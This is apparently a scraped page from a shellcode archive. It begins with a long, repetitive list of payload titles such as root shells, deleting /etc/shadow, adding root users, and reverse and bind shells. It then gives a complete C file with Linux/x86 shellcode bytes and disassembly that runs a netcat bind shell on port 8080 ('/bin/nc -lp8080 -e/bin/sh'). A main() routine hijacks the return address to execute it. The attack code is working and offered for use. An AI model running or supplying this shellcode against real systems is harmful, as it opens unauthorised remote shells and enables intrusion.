b51e0f27d5
52 new exploits Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) (38 bytes) Linux/x86 - unlink(/etc/passwd) & exit() (35 bytes) Linux i686 - pacman -S <package> (default package: backdoor) (64 bytes) Linux i686 - pacman -R <package> (59 bytes) Linux i686 - pacman -S <package> (default package: backdoor) (64 bytes) Linux i686 - pacman -R <package> (59 bytes) JITed stage-0 shellcode JITed exec notepad Shellcode Win32 - JITed stage-0 shellcode Win32 - JITed exec notepad Shellcode Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes) JITed egg-hunter stage-0 shellcode Win32/XP SP3 (RU) - WinExec+ExitProcess cmd shellcode (12 bytes) Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes) Windows - JITed egg-hunter stage-0 shellcode Win32/XP SP3 (RU) - WinExec+ExitProcess cmd shellcode (12 bytes) Linux/x86 - nc -lvve/bin/sh -p13377 shellcode Linux/x86 - polymorphic forkbombe - (30 bytes) Linux/x86 - forkbomb Linux/x86 - polymorphic forkbombe (30 bytes) Linux/x86 - forkbomb Linux/x86_64 - execve(_/bin/sh_); shellcode (30 bytes) Linux/x86 - sends _Phuck3d!_ to all terminals (60 bytes) Linux/x86_64 - execve(_/bin/sh_); shellcode (30 bytes) Linux/x86 - sends _Phuck3d!_ to all terminals (60 bytes) Linux/x86 - polymorphic execve(_/bin/bash___-p__NULL) (57 bytes) Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); (42 bytes) Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) (45 bytes) Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); (42 bytes) Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) (45 bytes) Linux/x86 - Disable randomize stack addresse (106 bytes) Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode 83 Linux/x86 - alphanumeric Bomb FORK Shellcode (117 bytes) Linux/x86 - Disable randomize stack addresse (106 bytes) Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode 83 Linux/x86 - alphanumeric Bomb FORK Shellcode (117 bytes) Linux/x86 - Shellcode Polymorphic - setuid(0) + chmod(_/etc/shadow__ 0666) Shellcode (61 bytes) Linux/x86 - kill all running process (11 bytes) Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) shellcode (45 bytes) Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (_/bin/sh_) shellcode (39 bytes) Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) shellcode (45 bytes) Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (_/bin/sh_) shellcode (39 bytes) Linux/x86 - unlink _/etc/shadow_ shellcode (33 bytes) Linux/x86 - hard / unclean reboot (29 bytes) Linux/x86 - hard / unclean reboot (33 bytes) Linux/x86 - unlink _/etc/shadow_ shellcode (33 bytes) Linux/x86 - hard / unclean reboot (29 bytes) Linux/x86 - hard / unclean reboot (33 bytes) Linux/x86 - chown root:root /bin/sh shellcode (48 bytes) Linux/x86 - give all user root access when execute /bin/sh (45 bytes) Linux/x86 - chown root:root /bin/sh shellcode (48 bytes) Linux/x86 - give all user root access when execute /bin/sh (45 bytes) Linux/ARM - setuid(0) & kill(-1_ SIGKILL) (28 bytes) Linux/ARM - execve(_/bin/sh___/bin/sh__0) (30 bytes) Linux/ARM - polymorphic chmod(_/etc/shadow__ 0777) (84 bytes) Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes) Linux/ARM - Disable ASLR Security (102 bytes) Linux/x86 - bind shell port 64533 (97 bytes) Safari JS JITed shellcode - exec calc (ASLR/DEP bypass) Windows - Safari JS JITed shellcode - exec calc (ASLR/DEP bypass) Win32 - Write-to-file Shellcode Linux/x86_64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) (49 bytes) Linux/x86 - netcat bindshell port 8080 (75 bytes) Shellcode Checksum Routine (18 bytes) Win32 - Shellcode Checksum Routine (18 bytes) Win32/XP SP3 (TR) - Add Admin Account Shellcode (127 bytes) Win32/XP Pro SP3 (EN) 32-bit - add new local administrator (113 bytes) Win32 - add new local administrator (326 bytes) Win32/XP Pro SP3 (EN) 32-bit - add new local administrator (113 bytes) Win32 - add new local administrator (326 bytes) Win32 - speaking shellcode Linux/x86 - netcat bindshell port 6666 (69 bytes) DNS Reverse Download and Exec Shellcode Windows - DNS Reverse Download and Exec Shellcode Linux/x86_32 - ConnectBack with SSL connection (422 bytes) Linux/x86 - ConnectBack with SSL connection (422 bytes) Linux/x86 - egghunt shellcode (29 bytes) Linux/MIPS - execve /bin/sh (48 bytes) Linux/MIPS - add user(UID 0) with password (164 bytes) Linux/MIPS - execve /bin/sh (48 bytes) Linux/MIPS - add user(UID 0) with password (164 bytes) Linux/x86 - execve(/bin/dash) (42 bytes) Linux/x86 - chmod (777 /etc/passwd & /etc/shadow)_ Add New Root User (ALI/ALI) & Execute /bin/sh (378 bytes) Linux/x86 - Obfuscated Shellcode chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash (521 bytes) Linux/x86 - rmdir (37 bytes) Linux/MIPS - execve (36 bytes) Windows XP x86-64 - Download & execute (Generator) Linux/x86 - /etc/passwd Reader (58 bytes) Linux - execve /bin/sh (23 bytes) Linux/x86 - execve /bin/sh (23 bytes) Linux/x86/x86_64 - reverse_tcp Shellcode Linux x86 & x86_64 - reverse_tcp Shellcode Linux/x86/x86_64 - tcp_bind Shellcode Linux/x86/x86_64 - Read etc/passwd Shellcode Linux x86 & x86_64 - tcp_bind Shellcode Linux x86 & x86_64 - Read etc/passwd Shellcode .Net Framework - Execute Native x86 Shellcode Win32 .Net Framework - Execute Native x86 Shellcode
61 lines
3 KiB
C
Executable file
61 lines
3 KiB
C
Executable file
/* 08048060 <_start>:
|
|
8048060: eb 2a jmp 804808c <GotoCall>
|
|
|
|
08048062 <shellcode>:
|
|
8048062: 5e pop %esi
|
|
8048063: 31 c0 xor %eax,%eax
|
|
8048065: 88 46 07 mov %al,0x7(%esi)
|
|
8048068: 88 46 0f mov %al,0xf(%esi)
|
|
804806b: 88 46 19 mov %al,0x19(%esi)
|
|
804806e: 89 76 1a mov %esi,0x1a(%esi)
|
|
8048071: 8d 5e 08 lea 0x8(%esi),%ebx
|
|
8048074: 89 5e 1e mov %ebx,0x1e(%esi)
|
|
8048077: 8d 5e 10 lea 0x10(%esi),%ebx
|
|
804807a: 89 5e 22 mov %ebx,0x22(%esi)
|
|
804807d: 89 46 26 mov %eax,0x26(%esi)
|
|
8048080: b0 0b mov $0xb,%al
|
|
8048082: 89 f3 mov %esi,%ebx
|
|
8048084: 8d 4e 1a lea 0x1a(%esi),%ecx
|
|
8048087: 8d 56 26 lea 0x26(%esi),%edx
|
|
804808a: cd 80 int $0x80
|
|
|
|
0804808c <GotoCall>:
|
|
804808c: e8 d1 ff ff ff call 8048062 <shellcode>
|
|
8048091: 2f das
|
|
8048092: 62 69 6e bound %ebp,0x6e(%ecx)
|
|
8048095: 2f das
|
|
8048096: 6e outsb %ds:(%esi),(%dx)
|
|
8048097: 63 23 arpl %sp,(%ebx)
|
|
8048099: 2d 6c 70 38 30 sub $0x3038706c,%eax
|
|
804809e: 38 30 cmp %dh,(%eax)
|
|
80480a0: 23 2d 65 2f 62 69 and 0x69622f65,%ebp
|
|
80480a6: 6e outsb %ds:(%esi),(%dx)
|
|
80480a7: 2f das
|
|
80480a8: 73 68 jae 8048112 <GotoCall+0x86>
|
|
80480aa: 23 41 41 and 0x41(%ecx),%eax
|
|
80480ad: 41 inc %ecx
|
|
80480ae: 41 inc %ecx
|
|
80480af: 42 inc %edx
|
|
80480b0: 42 inc %edx
|
|
80480b1: 42 inc %edx
|
|
80480b2: 42 inc %edx
|
|
80480b3: 43 inc %ebx
|
|
80480b4: 43 inc %ebx
|
|
80480b5: 43 inc %ebx
|
|
80480b6: 43 inc %ebx
|
|
80480b7: 44 inc %esp
|
|
80480b8: 44 inc %esp
|
|
80480b9: 44 inc %esp
|
|
80480ba: 44 inc %esp
|
|
*/
|
|
|
|
//bin/nc -lp8080 -e/bin/sh
|
|
char shellcode[] =
|
|
"\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0f\x88\x46\x19\x89\x76\x1a\x8d\x5e\x08\x89\x5e\x1e\x8d\x5e\x10\x89\x5e\x22\x89\x46\x26\xb0\x0b\x89\xf3\x8d\x4e\x1a\x8d\x56\x26\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x23\x2d\x6c\x70\x38\x30\x38\x30\x23\x2d\x65\x2f\x62\x69\x6e\x2f\x73\x68\x23";
|
|
|
|
int main()
|
|
{
|
|
int *ret;
|
|
ret = (int *)&ret + 2;
|
|
(*ret) = (int)shellcode;
|
|
}
|